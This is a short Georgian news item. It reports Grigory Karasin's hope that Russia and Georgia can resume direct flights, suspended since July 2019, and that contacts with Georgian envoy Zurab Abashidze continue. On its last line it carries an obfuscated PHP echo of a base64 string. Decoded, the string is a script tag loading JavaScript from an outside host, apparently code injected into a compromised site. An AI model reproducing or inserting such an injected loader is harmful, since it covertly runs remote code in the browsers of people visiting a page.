celsiusi
ავერსი საქკაბელი
რუსეთის საერთაშორისო საქმეთა ფედერაციის საბჭოს კომიტეტის თავმჯდომარე გრეგორი კარასინი იმედოვნებს, რომ რუსეთი საქართველოსთან პირდაპირი ავიამიმოსვლის აღდგენაზე მუშაობას გააგრძელებს. ამის შესახებ ინფორმაციას  TASS-ი ავრცელებს.
 
კარასინი აღნიშნავს, რომ პანდემიამდე მხარეები რუსეთ-საქართველოს შორის პირდაპირი ფრენების აღდგენის საკითხის გადაწყვეტასთან საკმაოდ ახლოს იყვნენ. „ვიმედოვნებთ ამ მიმართულებით მუშაობას გავაგრძელებთ. სამწუხაროდ, კოვიდმა ამას ხელი შეუშალა. ვიმედოვნებთ, რომ ახლა ვითარება დასტაბილურდება“, - აღნიშნა მან.
 
გრეგორი კარასინმა მედიასთან აღნიშნა, რომ ზოგადად რუსეთთან ურთიერთობების დარეგულირების საკითხში საქართველოს პრემიერ-მინისტრის სპეციალურ წარმომადგენელთან ზურაბ აბაშიძესთან კომუნიკაცია გრძელდება და საუბრები იმაზე, რომ ეს ფორმატი გაყინულია, უადგილოა. ამის შესახებ მან გამოცემასთან საერთაშორისო ეკონომიკური სამიტის „რუსეთი - ისლამური სამყარო: KazanSummit 2022”-ზე დასწრებისას ისაუბრა.
 
შეგახსენებთ, რომ  რუსეთ-საქართველოს შორის პირდაპირი ავიამიმოსვლა 2019 წლის 8 ივლისიდან შეწყდა. 
 
711
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");